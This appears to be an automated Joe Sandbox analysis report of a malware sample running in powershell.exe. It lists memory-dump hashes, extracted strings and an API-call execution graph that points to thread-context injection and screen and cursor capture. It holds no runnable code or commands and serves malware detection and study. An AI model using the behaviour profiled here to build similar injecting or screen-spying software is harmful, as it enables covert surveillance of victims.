                          • API ID: ContextThreadWow64
                          • String ID:
                          • API String ID: 983334009-0
                          • Opcode ID: 25b4ba795b728a6b27b2329d63f3667a39adb24c335d6deeb89cea8311022242
                          • Instruction ID: 9411cd438c3e3c9bcc75b04db23f3a6969b27b917e71fd96a9a25269112413d6
                          • Opcode Fuzzy Hash: 25b4ba795b728a6b27b2329d63f3667a39adb24c335d6deeb89cea8311022242
                          • Instruction Fuzzy Hash: 1F41CDB4D002589FDB14CFAAD884AEEFBF1BF49314F24842AE444B7254C739A985CF54

                          Control-flow Graph

                          APIs
                          • Wow64SetThreadContext.KERNEL32(?,?), ref: 010200EF
                          Memory Dump Source
                          • Source File: 00000008.00000002.382691132.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1020000_powershell.jbxd
                          Similarity
                          • API ID: ContextThreadWow64
                          • String ID:
                          • API String ID: 983334009-0
                          • Opcode ID: 7031e0f26f48ce354e050b0be7d79b0c641e2f8e758122fa1ead8d9c34c63979
                          • Instruction ID: f1ec93902ed5c5b28793680b80601fce508b445c06ed30c5aac9be7badb76a3c
                          • Opcode Fuzzy Hash: 7031e0f26f48ce354e050b0be7d79b0c641e2f8e758122fa1ead8d9c34c63979
                          • Instruction Fuzzy Hash: AB31BEB4D002589FDB14CFAAD984AEEFFF1AF49314F24802AE454B7244C738A945CF54

                          Control-flow Graph

                          APIs
                          • ResumeThread.KERNELBASE(?), ref: 0026FEE6
                          Memory Dump Source
                          • Source File: 00000008.00000002.382408222.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_260000_powershell.jbxd
                          Similarity
                          • API ID: ResumeThread
                          • String ID:
                          • API String ID: 947044025-0
                          • Opcode ID: 353923a5acf66a4c1b1f45b85a6930bfaa729bc48c0b9bae9f85fdebe27ed86d
                          • Instruction ID: 39ed3cf6113faccf368a7a3c84df590165c29a3b648622816d86d33bf822ac86
                          • Opcode Fuzzy Hash: 353923a5acf66a4c1b1f45b85a6930bfaa729bc48c0b9bae9f85fdebe27ed86d
                          • Instruction Fuzzy Hash: AB31EEB4D102089FCF14CFAAE984AEEFBB5AF49310F20942AE814B7310C735A945CF94

                          Control-flow Graph

                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.382501935.0000000000420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_420000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: @X
                          • API String ID: 0-3831194306
                          • Opcode ID: 582ad2c14a40ffea8a13758bd52b5a7b81503d209567902bc6756082d4068242
                          • Instruction ID: 8136d52a5a1f6f0b612a35c5d21704983ecbc44e82cd88ba5fd9eae7584beecd
                          • Opcode Fuzzy Hash: 582ad2c14a40ffea8a13758bd52b5a7b81503d209567902bc6756082d4068242
                          • Instruction Fuzzy Hash: ED41AE74B04210EFD721DB59DA90926FBB2EF86310B59C1ABD4098F352CBB6EC42CB55
                          Memory Dump Source
                          • Source File: 00000008.00000002.382501935.0000000000420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_420000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ba239c0eea5db91ec842322e84d780e22abc64b8460c9f4bb28d32a770a0a2d3
                          • Instruction ID: 5f4ee57833eed029ad98ce1b118498603a6ddf01eed6c23d9f9e314f6d3285e3
                          • Opcode Fuzzy Hash: ba239c0eea5db91ec842322e84d780e22abc64b8460c9f4bb28d32a770a0a2d3
                          • Instruction Fuzzy Hash: 8E0145203143842FCB2157744C65B7E2FA68F86701F94445BF845DF3C3C8B49C49832A
                          Memory Dump Source
                          • Source File: 00000008.00000002.382363314.000000000016D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0016D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_16d000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b9a60ac63fc1dbd71d7d8be6c08855f7cccddb946315f20619b3b1da85f132ec
                          • Instruction ID: 139eaac3527efd899212a81180a54f152d0cda17a8112a0cbad721b4fa96ba86
                          • Opcode Fuzzy Hash: b9a60ac63fc1dbd71d7d8be6c08855f7cccddb946315f20619b3b1da85f132ec
                          • Instruction Fuzzy Hash: F501A771A04380AAE7254E15ECC4B77BFD8DF41724F29C51AFC454B286C779D845C6B1
                          Memory Dump Source
                          • Source File: 00000008.00000002.382363314.000000000016D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0016D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_16d000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 48a83b039642342d5438a11c3aee39cec5e658a52674c806aabf6ed395eee5f4
                          • Instruction ID: df620918fe242038493490806f7ec92bb0ef130ca5958a7abf3a87ca21408c23
                          • Opcode Fuzzy Hash: 48a83b039642342d5438a11c3aee39cec5e658a52674c806aabf6ed395eee5f4
                          • Instruction Fuzzy Hash: A5010C6150D3C09FD7128B259C94B66BFB4DF53624F1E81DBE8888F2A7C2699C48C772
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.382408222.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_260000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'p$4'p
                          • API String ID: 0-3973980265
                          • Opcode ID: 0648a8353a072078af4dab97c14b8bb3f04988a8cfd843292d792675a484bd72
                          • Instruction ID: 992cd22fb56282c7de04529d8418ee2b86a9293f50bdff700394a089d5cb4880
                          • Opcode Fuzzy Hash: 0648a8353a072078af4dab97c14b8bb3f04988a8cfd843292d792675a484bd72
                          • Instruction Fuzzy Hash: A7613A75E016099FD709EF6AEC5568EBBF2AFC8300F04C829D5149B269EB3459068F90
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.382408222.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_260000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'p$4'p
                          • API String ID: 0-3973980265
                          • Opcode ID: 347f59bb38a1ad6960276b906225e44a53ca25267f739824d07ffb49a62cf55d
                          • Instruction ID: 9433527c4a9edbcf356a8349673c639fb9573074252025cd3a88dd5983b5f39b
                          • Opcode Fuzzy Hash: 347f59bb38a1ad6960276b906225e44a53ca25267f739824d07ffb49a62cf55d
                          • Instruction Fuzzy Hash: B3713A75E016099FD70AEF6AEC5568DBBF2AFC8300F04C829D5149B269EB7459068F90
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.382408222.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_260000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: UUUU
                          • API String ID: 0-1798160573
                          • Opcode ID: 6c3e7f5a13c34908a8470e5b51620dbeddff9c2a453f0c2114e8337d81cc7511
                          • Instruction ID: 3705a84a622c108fbf428c3f3baa6653c24f2922fa3e6c38b746d221537f38e6
                          • Opcode Fuzzy Hash: 6c3e7f5a13c34908a8470e5b51620dbeddff9c2a453f0c2114e8337d81cc7511
                          • Instruction Fuzzy Hash: 25129275E106598BDB58CFAEC98059DFBF2BF88304F28C529D418EB21AD734A946CF50
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.382408222.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_260000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: Dp
                          • API String ID: 0-2141643023
                          • Opcode ID: aaeb1f9d104dc580cfede5ac3f8472a82148c300f4384a93e2db5a6ff96cb954
                          • Instruction ID: e66cb52151d9e5eabf1f24a5ed66619c67c3358435e0999e19e26266e377f8a1
                          • Opcode Fuzzy Hash: aaeb1f9d104dc580cfede5ac3f8472a82148c300f4384a93e2db5a6ff96cb954
                          • Instruction Fuzzy Hash: 9DD1A174A00219CFDB54DFA9D994B9DBBF2BF88300F2085A9E409AB365DB359D81CF50
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.382408222.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_260000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: Dp
                          • API String ID: 0-2141643023
                          • Opcode ID: e2d13c657a52a72e672eb1a344f1accd6b75b148e6bf0cad4a0beefde7d7b1ca
                          • Instruction ID: fb1aba398912c795d3a184f98b026149a7317581e448b96b8eedf0fa43bbf352
                          • Opcode Fuzzy Hash: e2d13c657a52a72e672eb1a344f1accd6b75b148e6bf0cad4a0beefde7d7b1ca
                          • Instruction Fuzzy Hash: B6A1E274A10218CFDB58DF69D894B9DBBF2BF89300F1085A9E409AB365DB31AD85CF50
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.382408222.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_260000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: G
                          • API String ID: 0-985283518
                          • Opcode ID: bfe3dd8000fd022ff0b6ce9da432cba1ecc41f5dbe273c1eefc94cdfa934c80e
                          • Instruction ID: c5b9298123fa7639b58eda3fd564f1261fe55ba628086762ff876fca5bcdca03
                          • Opcode Fuzzy Hash: bfe3dd8000fd022ff0b6ce9da432cba1ecc41f5dbe273c1eefc94cdfa934c80e
                          • Instruction Fuzzy Hash: A43147B1D156298BDB18CF6ACC4439EBBF6BFC9300F14C0AAC908A6251DB340A85CF15
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.382501935.0000000000420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_420000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 8($ 8($ 8($4'p$4'p$<:($D8($D8($D8($L4p$L4p$L4p$L4p$L4p$L4p$$p$$p
                          • API String ID: 0-3248981073
                          • Opcode ID: 068cb7ef9c9cd49562c2aace683b3477bf28f55ff34218ae9dfe4c332b4d82f1
                          • Instruction ID: ab850522dcc3092d2b8c4d63fbeac9613cb45200c44af989d8bb6bfa70883a53
                          • Opcode Fuzzy Hash: 068cb7ef9c9cd49562c2aace683b3477bf28f55ff34218ae9dfe4c332b4d82f1
                          • Instruction Fuzzy Hash: 4EE14A31B00214DFCB299E68E85076F7BE2AFC5310F948467E9418B392CB79DD41C7A6
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.382501935.0000000000420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_420000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'p$4'p$4'p$4'p$4'p$4'p$tPp$tPp$$p$$p$$p$$p
                          • API String ID: 0-970164409
                          • Opcode ID: 1434869421ad477274012746c4972e78db0ca734f5cd1179b82a7519d228226d
                          • Instruction ID: be90fb20bfe14cd3847a915d646e1475b39149a13d813bfcedf4e5adb9de4940
                          • Opcode Fuzzy Hash: 1434869421ad477274012746c4972e78db0ca734f5cd1179b82a7519d228226d
                          • Instruction Fuzzy Hash: 7FC11631B043609FCB259E69A400B6BBFB1AFC5312FA8806FD5458B341DA7DCE46C796
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.382501935.0000000000420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_420000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: @9($@9($@X$@X$$p$$p$$p
                          • API String ID: 0-2659305391
                          • Opcode ID: 7aeccb3c93a888d3dc90e4f6ac979ffcb1b593b0ba3c9120560c9c4a93d3924c
                          • Instruction ID: 485f69243f2570bacfa8b6abe774815ee3063bfefedc36993a3e8c916a720232
                          • Opcode Fuzzy Hash: 7aeccb3c93a888d3dc90e4f6ac979ffcb1b593b0ba3c9120560c9c4a93d3924c
                          • Instruction Fuzzy Hash: C32144357003206BC7285D69A90073BABEA9FC4710FA4842FE849CB380CEF5EC01C369
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.382501935.0000000000420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_420000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: L4p$L4p$L4p$$p$$p
                          • API String ID: 0-1328183328
                          • Opcode ID: f4ca6ab07af24b218b6607e15b953705a10f493ff2ec33f198816d01666b6da0
                          • Instruction ID: b0de1b2882b02d0d27261f8c3116e83829c1fccd70e16df47623bbc851da425d
                          • Opcode Fuzzy Hash: f4ca6ab07af24b218b6607e15b953705a10f493ff2ec33f198816d01666b6da0
                          • Instruction Fuzzy Hash: 838138357003549FCB259A68E85076BBBE2AFC1300FA8847BD9418B393DB74DD45CB9A
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.382501935.0000000000420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_420000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 8($ 8($L4p$L4p$L4p
                          • API String ID: 0-1077449709
                          • Opcode ID: 2e26c119da58dd8f114f6585edab2f149352687621518f4c7b606548f1b749fd
                          • Instruction ID: 5a61418fd25629bebc79cb1b42aed3f1fe0d336c7c92b24f379849b34ca3ec43
                          • Opcode Fuzzy Hash: 2e26c119da58dd8f114f6585edab2f149352687621518f4c7b606548f1b749fd
                          • Instruction Fuzzy Hash: 585191716093D49FDB168A24A81476A7FB29F43300F9981DBD8818B2E3C779CC45CB66
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.382501935.0000000000420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_420000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: D8($D8($L4p$L4p$L4p
                          • API String ID: 0-2887981545
                          • Opcode ID: 1ee4b7c4abbd28b88bff3f93c144bb095de3287d933c40e7dcf658d0994e0503
                          • Instruction ID: ce41fc34f53a8aae535be6cad70997eb022fb33df0efd540f0df46a7a447afc4
                          • Opcode Fuzzy Hash: 1ee4b7c4abbd28b88bff3f93c144bb095de3287d933c40e7dcf658d0994e0503
                          • Instruction Fuzzy Hash: 2D419335B01254DFDF24DA54E444BAA7BE2AF80300F988167E9055B392C7B8DD85CB96
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.382501935.0000000000420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_420000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: @9($@9($$p$$p
                          • API String ID: 0-852208089
                          • Opcode ID: 519adfc6f275083f8088a0831ddfdade8b66df3affc1a08df8dd6e3435f459e9
                          • Instruction ID: e63cbdbb8511c4e0a2efeaba22d051a2e9ea3e761a8d0ad2ef9cb08d796979a3
                          • Opcode Fuzzy Hash: 519adfc6f275083f8088a0831ddfdade8b66df3affc1a08df8dd6e3435f459e9
                          • Instruction Fuzzy Hash: 0C215B307083902FCB224E35591077BBFB19FC2710F98849BE884CB3D2D6A89D09C325

                          Execution Graph

                          Execution Coverage:6.3%
                          Dynamic/Decrypted Code Coverage:16.4%
                          Signature Coverage:3.4%
                          Total number of Nodes:1821
                          Total number of Limit Nodes:56
                          execution_graph: [node/edge adjacency data of the rendered execution graph; 1821 nodes, 56 limit nodes]
54323 404ff4 82 API calls 54291->54323 54339 4050e4 84 API calls 54294->54339 54295 415d04 54295->54296 54296->54232 54298 40423a 28 API calls 54297->54298 54299 4041b5 54298->54299 54299->54224 54301 4020df 11 API calls 54300->54301 54321 41bebf 54301->54321 54302 41bf2f 54303 401fd8 11 API calls 54302->54303 54304 41bf61 54303->54304 54305 401fd8 11 API calls 54304->54305 54307 41bf69 54305->54307 54306 41bf31 54308 4041a2 28 API calls 54306->54308 54310 401fd8 11 API calls 54307->54310 54311 41bf3d 54308->54311 54309 4041a2 28 API calls 54309->54321 54312 415ba1 54310->54312 54313 401fe2 28 API calls 54311->54313 54312->54230 54312->54231 54312->54296 54315 41bf46 54313->54315 54314 401fe2 28 API calls 54314->54321 54317 401fd8 11 API calls 54315->54317 54316 401fd8 11 API calls 54316->54321 54318 41bf4e 54317->54318 54319 41cec5 28 API calls 54318->54319 54319->54302 54321->54302 54321->54306 54321->54309 54321->54314 54321->54316 54340 41cec5 54321->54340 54322->54240 54323->54295 54325 404f65 54324->54325 54326 404fea 54324->54326 54327 404f6e 54325->54327 54328 404fc0 CreateEventA CreateThread 54325->54328 54329 404f7d GetLocalTime 54325->54329 54326->54296 54327->54328 54328->54326 54373 405150 54328->54373 54330 41bc1f 28 API calls 54329->54330 54331 404f91 54330->54331 54372 4052fd 28 API calls 54331->54372 54339->54295 54341 41ced2 54340->54341 54342 41cf31 54341->54342 54346 41cee2 54341->54346 54343 41cf4b 54342->54343 54344 41d071 28 API calls 54342->54344 54360 41d1d7 28 API calls 54343->54360 54344->54343 54348 41cf1a 54346->54348 54351 41d071 54346->54351 54359 41d1d7 28 API calls 54348->54359 54350 41cf2d 54350->54321 54353 41d079 54351->54353 54352 41d0ab 54352->54348 54353->54352 54354 41d0af 54353->54354 54357 41d093 54353->54357 54371 402725 22 API calls 54354->54371 54361 41d0e2 54357->54361 54359->54350 54360->54350 54362 41d0ec __EH_prolog 54361->54362 54363 402717 22 API calls 54362->54363 54364 41d0ff 54363->54364 54365 41d1ee 11 API 
calls 54364->54365 54366 41d125 54365->54366 54367 41d15d 54366->54367 54368 402730 11 API calls 54366->54368 54367->54352 54369 41d144 54368->54369 54370 402712 11 API calls 54369->54370 54370->54367 54376 40515c 102 API calls 54373->54376 54375 405159 54376->54375 54378 441edd 54377->54378 54381 441ccd 54378->54381 54380 41bc43 54380->54112 54382 441ce4 54381->54382 54384 441d1b pre_c_initialization 54382->54384 54385 44062d 20 API calls _Atexit 54382->54385 54384->54380 54385->54384 54386 418eb1 CreateDCA CreateCompatibleDC 54435 419360 54386->54435 54388 418eec 54390 418f13 54388->54390 54440 4193a2 GetMonitorInfoW 54388->54440 54391 418f71 54390->54391 54438 4193d8 GetMonitorInfoW 54390->54438 54392 402093 28 API calls 54391->54392 54434 418f7d 54392->54434 54395 418f8a SelectObject 54398 418fa5 StretchBlt 54395->54398 54399 418f96 DeleteDC DeleteDC 54395->54399 54396 418f5e DeleteDC DeleteDC 54397 418f6b DeleteObject 54396->54397 54397->54391 54398->54399 54400 418fce 54398->54400 54399->54397 54402 418fd5 GetCursorInfo 54400->54402 54403 41904f 54400->54403 54402->54403 54404 418fec GetIconInfo 54402->54404 54405 419099 GetObjectA 54403->54405 54407 419062 BitBlt 54403->54407 54408 419089 54403->54408 54404->54403 54406 419002 DeleteObject DeleteObject DrawIcon 54404->54406 54405->54399 54410 4190b1 LocalAlloc 54405->54410 54406->54403 54407->54405 54408->54405 54411 419154 GlobalAlloc 54410->54411 54412 41914a 54410->54412 54411->54399 54413 419196 GetDIBits 54411->54413 54412->54411 54414 4191d3 54413->54414 54415 4191ad DeleteDC DeleteDC DeleteObject GlobalFree 54413->54415 54416 4020df 11 API calls 54414->54416 54415->54391 54417 41920f 54416->54417 54418 4020df 11 API calls 54417->54418 54419 41921b 54418->54419 54420 40250a 28 API calls 54419->54420 54421 41922b 54420->54421 54422 40250a 28 API calls 54421->54422 54423 419248 54422->54423 54424 40250a 28 API calls 54423->54424 54425 41926a 54424->54425 54426 41927b DeleteObject GlobalFree DeleteDC 
54425->54426 54427 4192a0 54426->54427 54428 41929d DeleteDC 54426->54428 54429 402055 11 API calls 54427->54429 54428->54427 54430 4192af 54429->54430 54431 401fd8 11 API calls 54430->54431 54432 4192bb 54431->54432 54433 401fd8 11 API calls 54432->54433 54433->54434 54436 436f10 ___scrt_get_show_window_mode 54435->54436 54437 41937e EnumDisplaySettingsW 54436->54437 54437->54388 54439 418f48 CreateCompatibleBitmap 54438->54439 54439->54395 54439->54396 54440->54390 54441 426a77 54442 426a8c 54441->54442 54454 426b1e 54441->54454 54443 426b83 54442->54443 54444 426bae 54442->54444 54447 426b0e 54442->54447 54451 426b4e 54442->54451 54453 426ad9 54442->54453 54442->54454 54455 426bd5 54442->54455 54469 424f6e 49 API calls ctype 54442->54469 54443->54444 54473 425781 21 API calls 54443->54473 54444->54454 54444->54455 54457 425b72 54444->54457 54447->54451 54447->54454 54471 424f6e 49 API calls ctype 54447->54471 54451->54443 54451->54454 54472 41fbfd 52 API calls 54451->54472 54453->54447 54453->54454 54470 41fbfd 52 API calls 54453->54470 54455->54454 54474 4261e6 28 API calls 54455->54474 54458 425b91 ___scrt_get_show_window_mode 54457->54458 54460 425ba0 54458->54460 54464 425bc5 54458->54464 54475 41ec4c 21 API calls 54458->54475 54460->54464 54468 425ba5 54460->54468 54476 420669 46 API calls 54460->54476 54463 425bae 54463->54464 54479 424d96 21 API calls 2 library calls 54463->54479 54464->54455 54466 425c48 54466->54464 54477 432f55 21 API calls _Yarn 54466->54477 54468->54463 54468->54464 54478 41daf0 49 API calls 54468->54478 54469->54453 54470->54453 54471->54451 54472->54451 54473->54444 54474->54454 54475->54460 54476->54466 54477->54468 54478->54463 54479->54464 54480 4165db 54481 401e65 22 API calls 54480->54481 54482 4165eb 54481->54482 54483 4020f6 28 API calls 54482->54483 54484 4165f6 54483->54484 54485 401e65 22 API calls 54484->54485 54486 416601 54485->54486 54487 4020f6 28 API calls 54486->54487 54488 41660c 54487->54488 54491 412965 
54488->54491 54492 40482d 3 API calls 54491->54492 54493 412979 54492->54493 54494 4048c8 97 API calls 54493->54494 54495 412981 54494->54495 54496 402f31 28 API calls 54495->54496 54497 41299a 54496->54497 54498 402f10 28 API calls 54497->54498 54499 4129a4 54498->54499 54500 404aa1 61 API calls 54499->54500 54501 4129ae 54500->54501 54502 401fd8 11 API calls 54501->54502 54503 4129b6 54502->54503 54504 404c10 130 API calls 54503->54504 54505 4129c4 54504->54505 54506 401fd8 11 API calls 54505->54506 54507 4129cc 54506->54507 54508 401fd8 11 API calls 54507->54508 54509 4129d4 54508->54509 54510 44839e 54518 448790 54510->54518 54514 4483c7 54515 4483ba 54515->54514 54526 4483ca 11 API calls 54515->54526 54517 4483b2 54519 44854a _Atexit 5 API calls 54518->54519 54520 4487b7 54519->54520 54521 4487cf TlsAlloc 54520->54521 54522 4487c0 54520->54522 54521->54522 54523 43502b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 54522->54523 54524 4483a8 54523->54524 54524->54517 54525 448319 20 API calls 3 library calls 54524->54525 54525->54515 54526->54517 54527 100020db 54530 100020e7 ___DestructExceptionObject 54527->54530 54528 100020f6 54529 10002110 dllmain_raw 54529->54528 54531 1000212a 54529->54531 54530->54528 54530->54529 54536 1000210b 54530->54536 54540 10001eec 54531->54540 54533 10002177 54533->54528 54534 10001eec 29 API calls 54533->54534 54535 1000218a 54534->54535 54535->54528 54538 10002193 dllmain_raw 54535->54538 54536->54528 54536->54533 54537 10001eec 29 API calls 54536->54537 54539 1000216d dllmain_raw 54537->54539 54538->54528 54539->54533 54541 10001ef7 54540->54541 54542 10001f2a dllmain_crt_process_detach 54540->54542 54543 10001f1c dllmain_crt_process_attach 54541->54543 54544 10001efc 54541->54544 54549 10001f06 54542->54549 54543->54549 54545 10001f01 54544->54545 54546 10001f12 54544->54546 54545->54549 54550 1000240b 25 API calls 54545->54550 54551 100023ec 27 API calls 54546->54551 54549->54536 54550->54549 
54551->54549 54552 434918 54553 434924 ___scrt_is_nonwritable_in_current_image 54552->54553 54579 434627 54553->54579 54555 43492b 54557 434954 54555->54557 54885 434a8a IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_get_show_window_mode 54555->54885 54566 434993 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 54557->54566 54590 4442d2 54557->54590 54561 434973 ___scrt_is_nonwritable_in_current_image 54562 4349f3 54598 434ba5 54562->54598 54566->54562 54886 443487 36 API calls 4 library calls 54566->54886 54580 434630 54579->54580 54891 434cb6 IsProcessorFeaturePresent 54580->54891 54582 43463c 54892 438fb1 54582->54892 54584 434641 54585 434645 54584->54585 54901 44415f 54584->54901 54585->54555 54588 43465c 54588->54555 54592 4442e9 54590->54592 54591 43502b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 54593 43496d 54591->54593 54592->54591 54593->54561 54594 444276 54593->54594 54595 4442a5 54594->54595 54596 43502b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 54595->54596 54597 4442ce 54596->54597 54597->54566 54599 436f10 ___scrt_get_show_window_mode 54598->54599 54600 434bb8 GetStartupInfoW 54599->54600 54601 4349f9 54600->54601 54602 444223 54601->54602 54951 44f0d9 54602->54951 54604 44422c 54606 434a02 54604->54606 54955 446895 36 API calls 54604->54955 54607 40ea00 54606->54607 55085 41cbe1 LoadLibraryA GetProcAddress 54607->55085 54609 40ea1c GetModuleFileNameW 55090 40f3fe 54609->55090 54611 40ea38 54612 4020f6 28 API calls 54611->54612 54613 40ea47 54612->54613 54614 4020f6 28 API calls 54613->54614 54615 40ea56 54614->54615 54616 41beac 28 API calls 54615->54616 54617 40ea5f 54616->54617 55105 40fb52 54617->55105 54619 40ea68 54620 401e8d 11 API calls 54619->54620 54621 40ea71 54620->54621 54622 40ea84 54621->54622 54623 40eace 54621->54623 55290 40fbee 118 API calls 54622->55290 54625 401e65 22 API calls 54623->54625 54627 40eade 
54625->54627 54626 40ea96 54628 401e65 22 API calls 54626->54628 54630 401e65 22 API calls 54627->54630 54629 40eaa2 54628->54629 55291 410f72 36 API calls __EH_prolog 54629->55291 54631 40eafd 54630->54631 54632 40531e 28 API calls 54631->54632 54634 40eb0c 54632->54634 54636 406383 28 API calls 54634->54636 54635 40eab4 55292 40fb9f 78 API calls 54635->55292 54638 40eb18 54636->54638 54640 401fe2 28 API calls 54638->54640 54639 40eabd 55293 40f3eb 71 API calls 54639->55293 54642 40eb24 54640->54642 54643 401fd8 11 API calls 54642->54643 54644 40eb2d 54643->54644 54646 401fd8 11 API calls 54644->54646 54648 40eb36 54646->54648 54649 401e65 22 API calls 54648->54649 54650 40eb3f 54649->54650 54651 401fc0 28 API calls 54650->54651 54652 40eb4a 54651->54652 54653 401e65 22 API calls 54652->54653 54654 40eb63 54653->54654 54655 401e65 22 API calls 54654->54655 54656 40eb7e 54655->54656 54657 40ebe9 54656->54657 55294 406c59 54656->55294 54658 401e65 22 API calls 54657->54658 54664 40ebf6 54658->54664 54660 40ebab 54661 401fe2 28 API calls 54660->54661 54662 40ebb7 54661->54662 54663 401fd8 11 API calls 54662->54663 54666 40ebc0 54663->54666 54665 40ec3d 54664->54665 54670 413584 3 API calls 54664->54670 55109 40d0a4 54665->55109 55299 413584 RegOpenKeyExA 54666->55299 54676 40ec21 54670->54676 54674 40f38a 55392 4139e4 30 API calls 54674->55392 54676->54665 55302 4139e4 30 API calls 54676->55302 54684 40f3a0 55393 4124b0 65 API calls ___scrt_get_show_window_mode 54684->55393 54885->54555 54886->54562 54891->54582 54893 438fb6 ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 54892->54893 54905 43a4ba 54893->54905 54896 438fc4 54896->54584 54898 438fcc 54899 438fd7 54898->54899 54919 43a4f6 DeleteCriticalSection 54898->54919 54899->54584 54947 44fbe8 54901->54947 54904 438fda 8 API calls 3 library calls 54904->54585 54906 43a4c3 54905->54906 54908 43a4ec 54906->54908 54910 438fc0 54906->54910 54920 438eff 54906->54920 54925 43a4f6 
